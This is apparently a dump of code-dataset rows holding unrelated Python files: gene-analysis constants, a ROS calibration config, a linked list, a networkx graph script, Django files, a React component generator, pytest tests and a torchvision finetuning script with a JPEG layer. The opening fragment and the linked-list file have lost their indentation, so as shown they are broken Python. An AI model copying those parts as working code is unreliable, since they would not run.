CNT_GENE = "cnt_gene" # Number of genes
CNT_REGULATED = "cnt_regulated" # Count of times up- down-regulated
CNT_TERM = "cnt_term" # Number of GO terms"
CNT_UP = "cnt_up" # Count of +1s present
CV = "cv" # coefficient of variation
END = "End" # Start position of gene
GENE_ID = "GENE_ID" # Unique string for gene
GENE_IDS = "GENE_IDs" # List of GENE_ID
GENE_NAME = "GENE_NAME"
GROUP = "group"
GO_LINK = "GO_Link"
GO_ONTOLOGY = "GO_Ontology"
GO_TERM = "GO_Term"
GROUP = "group"
HOURS = "hours"
INDEX = "index"
LENGTH = "Length" # Length of gene in base pairs
MEAN = "mean" # average value
PRODUCT = "PRODUCT" # Transcript product
SAMPLE = "sample" # Identity of a sample
TERM = "term" # GO term
STAGE_NAME = "name" # Name of the stage
STAGE_COLOR = "color" # Color for the stage
START = "Start" # Starting position of gene
STATE = "state"
STRAND = "Strand" # either "+" or "-"
STD = "std" # Standard deviation
TIMEPOINT = "timepoint" # time in the experiment
# Paths
PROJECT_DIR = os.path.abspath(__file__)
for _ in range(4):
PROJECT_DIR = os.path.dirname(PROJECT_DIR)
DATA_DIR = os.path.join(PROJECT_DIR, 'data')
CODE_DIR = PROJECT_DIR
for directory in ["xstate", "python"]:
CODE_DIR = os.path.join(CODE_DIR, directory)
TEST_DIR = os.path.join(CODE_DIR, "tests")
DATA_PROVIDER_PERSISTER_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"data_provider.pcl")
SAMPLES_DIR = os.path.join(DATA_DIR, "samples")
ENSEMBLE_PATH = os.path.join(DATA_DIR, "ensemble.pcl")
# Data Characeristics
NUM_TIMES = 26
REF_TIME = 0 # Reference time
|
15,615 | be0dadb6fd7765f957a78799b572dc973ac6b5b4 | import os
data_root = './data/camera1'# 绝对路径
data_collection_config = {'cam_id':0,
'img_wight':1280,'img_hight':720,
'scan_topic_name': 'scan', # 激光消息名字,一般为scan
'local_ros':True,
'ROS_HOSTNAME':"192.168.43.17",# if local_ros is False
'ROS_MASTER_UR':"http://192.168.43.56:11311/",# if local_ros is False
}
camera_config = {
'camera_model': 'pinhole',# fisheye, pinhole or omnidir(Mei) model
'tag_type': 'chess', # 'chess' or 'aruco'
'aruco_id': 0, # 如果使用单个'aruco',需要id(使用aruco.DICT_4X4_250)
'tag_size': 0.0104,#, #单位米 0.012
'checkerboard': (9,7), # if choice chess ,need
'inter_params_path': os.path.join(data_root,'inter_param.pkl'),# 内参路径
'exter_params_path': os.path.join(data_root,'exter_param.pkl'),# 外参路径
'inter_image_path': os.path.join(data_root,'inter_img'),# 内参图像路径
'exter_image_path':os.path.join(data_root,'exter_param.jpg'),# 外参图像路径
'K':None,'D':None,'Xi':None#或者手动输入内参,List
}
calibrate_config={
'select_laser':'auto'
'',# auto or manual
'one_by_one_show':True,# one by one frame to show laser data
'optimize_method': 'svd',# 目前只有svd
}
|
15,616 | cf6250601cd9caeb28243231cd357bd822c0479c | """变形链表的实现(为链表加入头结点和尾结点)"""
class LNode():
"""节点初始化函数"""
def __init__(self, item, prev = None,next_=None):
self.item = item
self.next = next_
self.prev = prev
class RList():
def __init__(self):
self._head = LNode(None,None,None)
self._rear = LNode(None,None,None)
self._head.next = self._rear
self._rear.prev = self._head
self.size = 0
"""操作函数实现"""
"""插入操作"""
# 头部插入
def preappend(self,elem):
node = LNode(elem)
node.next=self._head.next
self._head.next.prev = node
self._head.next = node
node.prev = self._head
self.size+=1
# 尾部插入
def append(self,elem):
node = LNode(elem)
node.prev = self._rear.prev
node.next = self._rear
self._rear.prev.next = node
self._rear.prev = node
self.size+=1
# 任意位置插入元素
def insert(self,i,elem):
if i<0 or i>self.size:
print("error")
else:
node = LNode(elem)
p = self._head
while i>0:
p = p.next
i-=1
node.next=p.next
p.next.prev = node
p.next = node
node.prev = p
self.size+=1
"""删除操作"""
# 尾部删除操作
def pop_last(self):
self._rear.prev.prev.next = self._rear
self._rear.prev = self._rear.prev.prev
self.size-=1
# 头部删除操作
def pop_head(self):
self._head.next.next.prev = self._head
self._head.next = self._head.next.next
self.size-=1
# 删除任意未位置元素
def pop(self,i):
if i<0 or i>self.size:
print("error!")
else:
p = self._head.next
# 确定删除节点的位置
while i>0:
p = p.next
i-=1
p.next.prev = p.prev
p.prev.next = p.next
self.size-=1
"""遍历操作"""
# 正序输出
def printall(self):
p = self._head.next
while p is not None and p!=self._rear:
print(p.item)
p = p.next
# 倒序输出
def printback(self):
p = self._rear.prev
while p is not None and p!=self._head:
print(p.item)
p = p.prev
# 元素的汇集
def for_each(self,proc):
pCurrent = self._head.next
while pCurrent is not None and pCurrent is not self._rear:
proc(pCurrent.item)
pCurrent = pCurrent.next
# 定义生成器函数
def elements(self):
pCurrent = self._head.next
while pCurrent is not None and pCurrent is not self._rear:
yield pCurrent.item
pCurrent = pCurrent.next
if __name__ =="__main__":
l = RList()
l.preappend(1)
l.preappend(2)
l.preappend(3)
l.preappend(4)
l.append(0)
l.insert(0,5)
l.pop(0)
l.printall()
print("#####")
l.printback()
print("-----")
print("长度:%d"%(l.size))
print("8888888888")
for x in l.elements():
print(x)
|
15,617 | e5617db2a373036bb448a5a71c793ddd482ae9a1 | print "[INFO] Reading aminer_edge_list.csv"
# all edges
edge_list = []
# self cited edges
edge_list_1 = []
# non self cited edges
edge_list_2 = []
import csv
with open('../output/aminer_edge_list.csv', 'rb') as file:
reader = csv.reader(file)
try:
for row in reader:
src = row[0]
dest = row[1]
type = row[2]
edge = (src, dest)
edge_list.append(edge)
if type == '1' : edge_list_1.append(edge)
else : edge_list_2.append(edge)
except :
pass
print "[INFO] Done reading"
print "[INFO] Generating graph"
import networkx as nx
import matplotlib.pyplot as plt
# make a new graph
G = nx.Graph()
all_edges = []
all_edges.extend(edge_list_1)
all_edges.extend(edge_list_2)
G.add_edges_from(all_edges)
# positions for all nodes
pos = nx.spring_layout(G)
# draw set of nodes
nx.draw_networkx_nodes(G, pos, node_size=15, node_color='b')
# draw set of edges from self cited list
nx.draw_networkx_edges(G,pos, edgelist=edge_list_1, width=1, edge_color='r')
# draw set of edges from non self cited list
nx.draw_networkx_edges(G,pos, edgelist=edge_list_2, width=1, edge_color='g')
plt.show() # display
print "[INFO] Done generating graph"
|
15,618 | e9fd9614cf343dcd2e578875602749d97a167a4d | # Generated by Django 2.0.2 on 2019-11-26 09:07
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the Player table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Player',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('full_name', models.CharField(max_length=100)),
                ('age', models.IntegerField()),
                ('league', models.CharField(max_length=100)),
                ('position', models.CharField(max_length=100)),
                ('current_club', models.CharField(max_length=100)),
                ('minutes_played', models.IntegerField()),
                ('nationality', models.CharField(max_length=100)),
                # BUG FIX: max_length is not a valid IntegerField option
                # (it is only meaningful for character fields and is flagged
                # by Django's system checks); it was dropped here.  The
                # generated schema is unchanged.
                ('appearances', models.IntegerField()),
                ('goals_overall', models.IntegerField(default=0)),
                ('goals_home', models.IntegerField(default=0)),
                ('goals_away', models.IntegerField(default=0)),
                ('assists_overall', models.IntegerField(default=0)),
                ('clean_sheets_overall', models.IntegerField(default=0)),
                ('yellow_cards_overall', models.IntegerField(default=0)),
                ('red_cards_overall', models.IntegerField(default=0)),
            ],
        ),
    ]
|
15,619 | 8873d2acd50b5adaf3d0768cdba8b74514b0dca2 | # create_component.py - Creates React component from sample files
# into specified folder
# Make python2/3 compatible
from __future__ import print_function
import os
import sys
import argparse
from argparse import RawTextHelpFormatter
# Make python2/3 compatible
# Make python2/3 compatible
if (sys.version_info[0] < 3):
    input = raw_input # python2 input parses strings as python syntax

PROG_DESC = """
create_component.py - Creates a React Component with
given name into the specified folder.
 - <name>.tsx
 - <name>.test.tsx
 - index.tsx
specify config settings in 'crc.config.json' within
yarn root director
"""

# Command-line interface: positional component name and target directory.
parser = argparse.ArgumentParser(description=PROG_DESC,formatter_class=RawTextHelpFormatter)
parser.add_argument("name",help="Name of React Component")
parser.add_argument("path",help="Directory path for component, omit filename")
args = parser.parse_args()

# Make required directory folder structure
component_folder = os.path.join(args.path,args.name);
if (os.path.isdir(component_folder)):
    # Ask before writing into an existing component folder.
    opt = input("Folder exists, confirm potential overwrite(y/n):")
    if (opt != "y"):
        print("Script aborted, folder already exists")
        exit(1)
else:
    os.makedirs(component_folder);

# Read template files
__dir__ = os.getcwd();
TEMPLATE_COMPONENT_PATH = "template.tsx" #TODO: Replace with read from crc.config.json
TEMPLATE_TEST_PATH = "template.test.tsx" #TODO: Replace with read from crc.config.json
TEMPLATE_INDEX_PATH = "template.index.tsx"#TODO: Replace with read from crc.config.json

# Replace inline variables with specified configs
#TODO Read variable mapping from crc.config.json
# var_mapping maps template placeholders (e.g. "$NAME") to their values.
var_mapping = dict()
var_mapping["$NAME"] = args.name
def parseFileLines(fname):
    """Read *fname* and substitute template variables.

    Each occurrence of a key from the module-level ``var_mapping`` dict is
    replaced by its mapped value.  Returns the substituted file contents as
    a single string, or None if the file cannot be read (callers treat None
    as "template missing").
    """
    file_data = ""
    try:
        with open(fname, 'r') as fin:
            for line in fin:
                for key in var_mapping.keys():
                    line = line.replace(key, var_mapping[key])
                file_data += line
    # BUG FIX: previously caught Exception (with an unused binding), hiding
    # real programming errors; only I/O and decoding failures mean
    # "template unavailable".
    except (OSError, UnicodeDecodeError):
        return None
    return file_data
def writeFileLines(fname, file_lines):
    """Write *file_lines* (an iterable of strings, or one string) to *fname*."""
    with open(fname, 'w+') as out:
        out.writelines(file_lines)
# Read component template
component = parseFileLines(os.path.join(__dir__,TEMPLATE_COMPONENT_PATH))
# Read test template
test = parseFileLines(os.path.join(__dir__,TEMPLATE_TEST_PATH))
# Read index template
index = parseFileLines(os.path.join(__dir__,TEMPLATE_INDEX_PATH))

# Write files
component_file_path = os.path.join(component_folder,args.name+".tsx")
test_file_path = os.path.join(component_folder,args.name+".test.tsx")
index_file_path = os.path.join(component_folder,"index.tsx");
# Component and index templates are mandatory; the test template is optional.
if (not component or not index):
    print("Error, no component or index template found.",file=sys.stderr)
    exit(1)
writeFileLines(component_file_path,component)
writeFileLines(index_file_path,index)
if (test):
    writeFileLines(test_file_path,test)
|
15,620 | c2f66d43908eeb1901e2f45116ece8982253a138 |
def df2input(df, categories=None, numerical=None, ordinal=None, response=None):
    """Prepare a dataframe for machine learning.

    Selects the requested feature columns plus the response, drops rows with
    missing values, one-hot-encodes categorical and ordinal features, and
    returns the result in dataframe, array and series form.

    Arguments:
        df: the input dataframe.
        categories: categorical features of df.
        numerical: numerical float or int features of df.
        ordinal: ordinal features (unspecific scale: high, medium, low).
        response: name of the response column.

    Returns:
        (df_features, array_features, series_response): the prepped feature
        dataframe, its numpy array version, and the response series.
    """
    import pandas as pd

    # Avoid mutable default arguments; None means "no features of this kind".
    categories = [] if categories is None else categories
    numerical = [] if numerical is None else numerical
    ordinal = [] if ordinal is None else ordinal

    feature_columns = categories + numerical + ordinal
    feature_columns.append(response)
    # Select once (the original built this selection twice).
    selected = df[feature_columns]
    print(" original features shape:", selected.shape)
    df_features = selected.dropna()
    print("eliminated empty records features shape:", df_features.shape)
    series_response = df_features[response]
    # drop() returns a copy, avoiding chained-assignment warnings that
    # inplace=True on a derived frame can trigger.
    df_features = df_features.drop(columns=[response])
    # One-hot-encode the categorical and ordinal features.
    ohe_columns = categories + ordinal
    df_features = pd.get_dummies(df_features, columns=ohe_columns)
    print(" OHE features shape:", df_features.shape)
    array_features = df_features.to_numpy()
    return df_features, array_features, series_response
|
15,621 | 766d1ec9e6488016c89087b05544a02369d4200f | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
from day1 import *
import pytest
class TestSanta:
    """Unit tests for day1's Santa floor-tracking puzzle."""

    def setup_method(self, method):
        """Create a fresh Santa before each test."""
        self.santa = Santa()

    def test_constructor(self):
        """A newly constructed Santa starts on floor 0."""
        assert self.santa.floor == 0

    # Each case pairs an instruction string ('(' = up, ')' = down) with the
    # floor Santa should end on.
    @pytest.mark.parametrize("instructions,floor", [
        ("(())", 0),
        ("()()", 0),
        ("(((", 3),
        ("(()(()(", 3),
        ("))(((((", 3),
        ("())", -1),
        ("))(", -1),
        (")))", -3),
        (")())())", -3),
    ])
    def test_move(self, instructions, floor):
        """Following the instructions one step at a time ends on the expected floor."""
        for step in instructions:
            self.santa.move(step)
        assert self.santa.floor == floor
|
15,622 | 6901c7e57c319c25b6123bfb5121d7c83957b8d4 |
from django.urls import path, include
from . import views
urlpatterns = [
path('review/', views.review, name='review'),
path('write_review/',views.writereview, name = 'writereview'),
] |
15,623 | a6f02ce64008701b4c9c35610a18d6944f60fae7 | """
Finetuning Torchvision Models
=============================
**Author:** `Nathan Inkawhich <https://github.com/inkawhich>`__
"""
######################################################################
# In this tutorial we will take a deeper look at how to finetune and
# feature extract the `torchvision
# models <https://pytorch.org/docs/stable/torchvision/models.html>`__, all
# of which have been pretrained on the 1000-class Imagenet dataset. This
# tutorial will give an indepth look at how to work with several modern
# CNN architectures, and will build an intuition for finetuning any
# PyTorch model. Since each model architecture is different, there is no
# boilerplate finetuning code that will work in all scenarios. Rather, the
# researcher must look at the existing architecture and make custom
# adjustments for each model.
#
# In this document we will perform two types of transfer learning:
# finetuning and feature extraction. In **finetuning**, we start with a
# pretrained model and update *all* of the model’s parameters for our new
# task, in essence retraining the whole model. In **feature extraction**,
# we start with a pretrained model and only update the final layer weights
# from which we derive predictions. It is called feature extraction
# because we use the pretrained CNN as a fixed feature-extractor, and only
# change the output layer. For more technical information about transfer
# learning see `here <https://cs231n.github.io/transfer-learning/>`__ and
# `here <https://ruder.io/transfer-learning/>`__.
#
# In general both transfer learning methods follow the same few steps:
#
# - Initialize the pretrained model
# - Reshape the final layer(s) to have the same number of outputs as the
# number of classes in the new dataset
# - Define for the optimization algorithm which parameters we want to
# update during training
# - Run the training step
#
from __future__ import print_function
from __future__ import division
import sys
import PIL
import torch
import torch.nn as nn
import torch.optim as optim
import torch.distributed as dist
import numpy as np
import torchvision
from torchvision import datasets, models, transforms
import matplotlib.pyplot as plt
import time
import os
import copy
import argparse
from jpeg_layer import *
print("PyTorch Version: ",torch.__version__)
print("Torchvision Version: ",torchvision.__version__)
######################################################################
# Inputs
# ------
#
# Here are all of the parameters to change for the run. We will use the
# *hymenoptera_data* dataset which can be downloaded
# `here <https://download.pytorch.org/tutorial/hymenoptera_data.zip>`__.
# This dataset contains two classes, **bees** and **ants**, and is
# structured such that we can use the
# `ImageFolder <https://pytorch.org/docs/stable/torchvision/datasets.html#torchvision.datasets.ImageFolder>`__
# dataset, rather than writing our own custom dataset. Download the data
# and set the ``data_dir`` input to the root directory of the dataset. The
# ``model_name`` input is the name of the model you wish to use and must
# be selected from this list:
#
# ::
#
# [resnet, alexnet, vgg, squeezenet, densenet, inception]
#
# The other inputs are as follows: ``num_classes`` is the number of
# classes in the dataset, ``batch_size`` is the batch size used for
# training and may be adjusted according to the capability of your
# machine, ``num_epochs`` is the number of training epochs we want to run,
# and ``feature_extract`` is a boolean that defines if we are finetuning
# or feature extracting. If ``feature_extract = False``, the model is
# finetuned and all model parameters are updated. If
# ``feature_extract = True``, only the last layer parameters are updated,
# the others remain fixed.
#
parser = argparse.ArgumentParser(description = \
'Neural Network with JpegLayer')
# Top level data directory. Here we assume the format of the directory conforms
# to the ImageFolder structure
#data_dir = "./hymenoptera_data"
parser.add_argument('--data_dir', '-d', type=str,\
default='/data/jenna/data/', \
help='Directory of the input data. \
String. Default: /data/jenna/data/')
# Models to choose from [resnet, alexnet, vgg, squeezenet, densenet, inception]
#model_name = "squeezenet"
parser.add_argument('--model_name', '-m', type=str,\
default='squeezenet',\
help = 'NN models to choose from [resnet, alexnet, \
vgg, squeezenet, densenet, inception]. \
String. Default: squeezenet')
# Number of classes in the dataset
#num_classes = 3
parser.add_argument('--num_classes', '-c', type=int,\
default = 3,\
help = 'Number of classes in the dataset. \
Integer. Default: 3')
# Batch size for training (change depending on how much memory you have)
#batch_size = 8
parser.add_argument('--batch_size', '-b', type=int,\
default = 8,\
help = 'Batch size for training (can change depending\
on how much memory you have. \
Integer. Default: 8)')
# Number of epochs to train for
#num_epochs = 25
parser.add_argument('-ep', '--num_epochs', type=int,\
default = 25,\
help = 'Number of echos to train for. \
Integer. Default:25')
#Flag for whether to add jpeg layer to train quantization matrix
#add_jpeg_layer = True
parser.add_argument('--add_jpeg_layer', '-jpeg', \
action = 'store_false',\
help = 'Flag for adding jpeg layer to neural network. \
Bool. Default: True')
#Flag for initialization for quantization table. When true,qtable is uniformly random. When false, qtable is jpeg standard.
parser.add_argument('--rand_qtable', '-rq', \
action = 'store_false',\
help='Flag for initialization for quantization table. \
When true,qtable is uniformly random. When false, \
qtable is jpeg standard.\
Bool. Default: True.')
# Flag for printing trained quantization matrix
parser.add_argument('--qtable', '-q', \
action = 'store_true',\
help = 'Flag for print quantization matrix. \
Bool. Default: False.')
#Flag for visualizing the jpeg layer
parser.add_argument('--visualize', '-v',\
action = 'store_false',\
help = 'Flag for visualizing the jpeg layer. \
Bool. Default: True')
#Flag for regularize the magnitude of quantization table
#regularize = True
parser.add_argument('--regularize','-r',\
action = 'store_false',\
help = 'Flag for regularize the magnitude of \
quantizaiton table. Without the term, the quantization \
table goes to 0 \
Bool. Default: True')
#Jpeg quality. To calculate a scaling factor for qtable and result in different compression rate.
parser.add_argument('--quality', type = int,\
default = 50,\
help = 'Jpeg quality. It is used to calculate \
a quality factor for different compression rate. \
Integer. Default: 50')
parser.add_argument('--quant_only', action = 'store_true')
parser.add_argument('--cnn_only', action = 'store_true')
feature_extract = False
#parse the inputs
args,unparsed = parser.parse_known_args()
print(args)
######################################################################
# Helper Functions
# ----------------
#
# Before we write the code for adjusting the models, lets define a few
# helper functions.
#
# Model Training and Validation Code
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# The ``train_model`` function handles the training and validation of a
# given model. As input, it takes a PyTorch model, a dictionary of
# dataloaders, a loss function, an optimizer, a specified number of epochs
# to train and validate for, and a boolean flag for when the model is an
# Inception model. The *is_inception* flag is used to accomodate the
# *Inception v3* model, as that architecture uses an auxiliary output and
# the overall model loss respects both the auxiliary output and the final
# output, as described
# `here <https://discuss.pytorch.org/t/how-to-optimize-inception-model-with-auxiliary-classifiers/7958>`__.
# The function trains for the specified number of epochs and after each
# epoch runs a full validation step. It also keeps track of the best
# performing model (in terms of validation accuracy), and at the end of
# training returns the best performing model. After each epoch, the
# training and validation accuracies are printed.
#
def train_model(model, dataloaders, criterion, optimizer, num_epochs=25, is_inception=False, train = True):
    """Train and validate ``model``, returning the best-validation weights.

    Arguments:
        model: the network to train (already moved to ``device``).
        dataloaders: dict with "train" and "val" DataLoaders.
        criterion: classification loss.
        optimizer: optimizer over the parameters to update.
        num_epochs: number of epochs to run.
        is_inception: Inception v3 has an auxiliary head whose loss is
            weighted by 0.4 during training.
        train: when False, only the validation phase is run.

    Returns:
        (model with the best validation weights loaded, list of per-epoch
        validation accuracies).

    NOTE(review): relies on the module-level ``device`` and ``args`` globals.
    """
    since = time.time()
    val_acc_history = []
    best_model_wts = copy.deepcopy(model.state_dict())
    best_acc = 0.0
    phases =['train', 'val']
    if not train:
        phases = ['val']
    for epoch in range(num_epochs):
        print('Epoch {}/{}'.format(epoch, num_epochs - 1))
        print('-' * 10)
        # Each epoch has a training and validation phase
        for phase in phases:
            if phase == 'train':
                model.train()  # Set model to training mode
            else:
                model.eval()   # Set model to evaluate mode
            running_loss = 0.0
            running_corrects = 0
            # Iterate over data.
            for inputs, labels in dataloaders[phase]:
                inputs = inputs.to(device)
                labels = labels.to(device)
                # zero the parameter gradients
                if train:
                    optimizer.zero_grad()
                # forward
                # track history if only in train
                with torch.set_grad_enabled(phase == 'train'):
                    # Get model outputs and calculate loss
                    # Special case for inception because in training it has an auxiliary output. In train
                    #   mode we calculate the loss by summing the final output and the auxiliary output
                    #   but in testing we only consider the final output.
                    #add regularization
                    reg_loss = 0
                    factor = 0.1
                    if args.regularize:
                        # NOTE(review): size_average is deprecated in newer
                        # torch releases; reduction='mean' is the modern
                        # equivalent -- confirm the torch version in use.
                        reg_crit = nn.L1Loss(size_average=True)
                        target = torch.Tensor(3,8,8).cuda()
                        target.fill_(0)
                        # Penalise the inverse L1 magnitude of the first
                        # "quantize" parameter so the table doesn't collapse
                        # towards zero.
                        for name, param in model.named_parameters():
                            if "quantize" in name:
                                reg_loss = factor /reg_crit(param,target) * inputs.size(0)
                                break
                    if is_inception and phase == 'train':
                        # From https://discuss.pytorch.org/t/how-to-optimize-inception-model-with-auxiliary-classifiers/7958
                        outputs, aux_outputs = model(inputs)
                        loss1 = criterion(outputs, labels)
                        loss2 = criterion(aux_outputs, labels)
                        loss = loss1 + 0.4*loss2
                    else:
                        outputs = model(inputs)
                        loss = criterion(outputs, labels)
                    loss = reg_loss + loss
                    _, preds = torch.max(outputs, 1)
                    # backward + optimize only if in training phase
                    if phase == 'train':
                        loss.backward()
                        optimizer.step()
                # statistics
                running_loss += loss.item() * inputs.size(0)
                running_corrects += torch.sum(preds == labels.data)
            epoch_loss = running_loss / len(dataloaders[phase].dataset)
            epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)
            print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))
            # if(epoch_acc < 0.5):
            #     for name, param in model.named_parameters():
            #         if 'quantize' in name:
            #             print(param*255)
            #     torch.save(model.state_dict(), 'model.fail')
            #     sys.exit(0)
            # deep copy the model
            if phase == 'val' and epoch_acc > best_acc:
                best_acc = epoch_acc
                best_model_wts = copy.deepcopy(model.state_dict())
            if phase == 'val':
                val_acc_history.append(epoch_acc)
        print()
    time_elapsed = time.time() - since
    print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
    print('Best val Acc: {:4f}'.format(best_acc))
    # load best model weights
    model.load_state_dict(best_model_wts)
    return model, val_acc_history
######################################################################
# Set Model Parameters’ .requires_grad attribute
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# This helper function sets the ``.requires_grad`` attribute of the
# parameters in the model to False when we are feature extracting. By
# default, when we load a pretrained model all of the parameters have
# ``.requires_grad=True``, which is fine if we are training from scratch
# or finetuning. However, if we are feature extracting and only want to
# compute gradients for the newly initialized layer then we want all of
# the other parameters to not require gradients. This will make more sense
# later.
#
def set_parameter_requires_grad(model, first, feature_extract, quant_only=False, cnn_only=False):
    """Freeze parameter groups according to the training mode.

    On the first call with feature_extract=True, both groups are frozen.
    Otherwise quant_only freezes every non-quantize parameter, while
    cnn_only freezes every parameter whose name contains 'quantize'.
    """
    if first and feature_extract:
        quant_only = cnn_only = True
    for param_name, param in model.named_parameters():
        is_quantize = 'quantize' in param_name
        # Freeze when the parameter belongs to the group excluded from training.
        if (quant_only and not is_quantize) or (cnn_only and is_quantize):
            param.requires_grad = False
######################################################################
# Initialize and Reshape the Networks
# -----------------------------------
#
# Now to the most interesting part. Here is where we handle the reshaping
# of each network. Note, this is not an automatic procedure and is unique
# to each model. Recall, the final layer of a CNN model, which is often
# times an FC layer, has the same number of nodes as the number of output
# classes in the dataset. Since all of the models have been pretrained on
# Imagenet, they all have output layers of size 1000, one node for each
# class. The goal here is to reshape the last layer to have the same
# number of inputs as before, AND to have the same number of outputs as
# the number of classes in the dataset. In the following sections we will
# discuss how to alter the architecture of each model individually. But
# first, there is one important detail regarding the difference between
# finetuning and feature-extraction.
#
# When feature extracting, we only want to update the parameters of the
# last layer, or in other words, we only want to update the parameters for
# the layer(s) we are reshaping. Therefore, we do not need to compute the
# gradients of the parameters that we are not changing, so for efficiency
# we set the .requires_grad attribute to False. This is important because
# by default, this attribute is set to True. Then, when we initialize the
# new layer and by default the new parameters have ``.requires_grad=True``
# so only the new layer’s parameters will be updated. When we are
# finetuning we can leave all of the .required_grad’s set to the default
# of True.
#
# Finally, notice that inception_v3 requires the input size to be
# (299,299), whereas all of the other models expect (224,224).
#
# Resnet
# ~~~~~~
#
# Resnet was introduced in the paper `Deep Residual Learning for Image
# Recognition <https://arxiv.org/abs/1512.03385>`__. There are several
# variants of different sizes, including Resnet18, Resnet34, Resnet50,
# Resnet101, and Resnet152, all of which are available from torchvision
# models. Here we use Resnet18, as our dataset is small and only has two
# classes. When we print the model, we see that the last layer is a fully
# connected layer as shown below:
#
# ::
#
# (fc): Linear(in_features=512, out_features=1000, bias=True)
#
# Thus, we must reinitialize ``model.fc`` to be a Linear layer with 512
# input features and 2 output features with:
#
# ::
#
# model.fc = nn.Linear(512, num_classes)
#
# Alexnet
# ~~~~~~~
#
# Alexnet was introduced in the paper `ImageNet Classification with Deep
# Convolutional Neural
# Networks <https://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks.pdf>`__
# and was the first very successful CNN on the ImageNet dataset. When we
# print the model architecture, we see the model output comes from the 6th
# layer of the classifier
#
# ::
#
# (classifier): Sequential(
# ...
# (6): Linear(in_features=4096, out_features=1000, bias=True)
# )
#
# To use the model with our dataset we reinitialize this layer as
#
# ::
#
# model.classifier[6] = nn.Linear(4096,num_classes)
#
# VGG
# ~~~
#
# VGG was introduced in the paper `Very Deep Convolutional Networks for
# Large-Scale Image Recognition <https://arxiv.org/pdf/1409.1556.pdf>`__.
# Torchvision offers eight versions of VGG with various lengths and some
# that have batch normalizations layers. Here we use VGG-11 with batch
# normalization. The output layer is similar to Alexnet, i.e.
#
# ::
#
# (classifier): Sequential(
# ...
# (6): Linear(in_features=4096, out_features=1000, bias=True)
# )
#
# Therefore, we use the same technique to modify the output layer
#
# ::
#
# model.classifier[6] = nn.Linear(4096,num_classes)
#
# Squeezenet
# ~~~~~~~~~~
#
# The Squeeznet architecture is described in the paper `SqueezeNet:
# AlexNet-level accuracy with 50x fewer parameters and <0.5MB model
# size <https://arxiv.org/abs/1602.07360>`__ and uses a different output
# structure than any of the other models shown here. Torchvision has two
# versions of Squeezenet, we use version 1.0. The output comes from a 1x1
# convolutional layer which is the 1st layer of the classifier:
#
# ::
#
# (classifier): Sequential(
# (0): Dropout(p=0.5)
# (1): Conv2d(512, 1000, kernel_size=(1, 1), stride=(1, 1))
# (2): ReLU(inplace)
# (3): AvgPool2d(kernel_size=13, stride=1, padding=0)
# )
#
# To modify the network, we reinitialize the Conv2d layer to have an
# output feature map of depth 2 as
#
# ::
#
# model.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1,1), stride=(1,1))
#
# Densenet
# ~~~~~~~~
#
# Densenet was introduced in the paper `Densely Connected Convolutional
# Networks <https://arxiv.org/abs/1608.06993>`__. Torchvision has four
# variants of Densenet but here we only use Densenet-121. The output layer
# is a linear layer with 1024 input features:
#
# ::
#
# (classifier): Linear(in_features=1024, out_features=1000, bias=True)
#
# To reshape the network, we reinitialize the classifier’s linear layer as
#
# ::
#
# model.classifier = nn.Linear(1024, num_classes)
#
# Inception v3
# ~~~~~~~~~~~~
#
# Finally, Inception v3 was first described in `Rethinking the Inception
# Architecture for Computer
# Vision <https://arxiv.org/pdf/1512.00567v1.pdf>`__. This network is
# unique because it has two output layers when training. The second output
# is known as an auxiliary output and is contained in the AuxLogits part
# of the network. The primary output is a linear layer at the end of the
# network. Note, when testing we only consider the primary output. The
# auxiliary output and primary output of the loaded model are printed as:
#
# ::
#
# (AuxLogits): InceptionAux(
# ...
# (fc): Linear(in_features=768, out_features=1000, bias=True)
# )
# ...
# (fc): Linear(in_features=2048, out_features=1000, bias=True)
#
# To finetune this model we must reshape both layers. This is accomplished
# with the following
#
# ::
#
# model.AuxLogits.fc = nn.Linear(768, num_classes)
# model.fc = nn.Linear(2048, num_classes)
#
# Notice, many of the models have similar output structures, but each must
# be handled slightly differently. Also, check out the printed model
# architecture of the reshaped network and make sure the number of output
# features is the same as the number of classes in the dataset.
#
def initialize_model(model_name, num_classes, feature_extract = False, add_jpeg_layer = False, train_quant_only = False, train_cnn_only=False, rand_qtable = True, quality = 50, use_pretrained=True):
    """Create an (optionally pretrained) torchvision model, reshape its head
    to `num_classes`, apply the freezing policy, and optionally prepend a
    differentiable JpegLayer. Returns (model, input_size).

    NOTE(review): input_size is 448 here rather than torchvision's native
    224 — presumably deliberate for the JPEG-layer experiments; confirm.
    """
    # Initialize these variables which will be set in this if statement. Each of these
    # variables is model specific.
    model_ft = None
    input_size = 0
    if model_name == "resnet":
        """ Resnet18
        """
        model_ft = models.resnet18(pretrained=use_pretrained)
        set_parameter_requires_grad(model_ft,\
            True, feature_extract)
        num_ftrs = model_ft.fc.in_features
        model_ft.fc = nn.Linear(num_ftrs, num_classes)
        input_size = 448
    elif model_name == "alexnet":
        """ Alexnet
        """
        model_ft = models.alexnet(pretrained=use_pretrained)
        set_parameter_requires_grad(model_ft,\
            True, feature_extract)
        num_ftrs = model_ft.classifier[6].in_features
        model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)
        input_size = 448
    elif model_name == "vgg":
        """ VGG11_bn
        """
        model_ft = models.vgg11_bn(pretrained=use_pretrained)
        set_parameter_requires_grad(model_ft,\
            True, feature_extract)
        num_ftrs = model_ft.classifier[6].in_features
        model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)
        input_size = 448
    elif model_name == "squeezenet":
        """ Squeezenet
        """
        model_ft = models.squeezenet1_0(pretrained=use_pretrained)
        set_parameter_requires_grad(model_ft,\
            True, feature_extract)
        # Squeezenet classifies via a 1x1 conv, not a Linear layer.
        model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1,1), stride=(1,1))
        model_ft.num_classes = num_classes
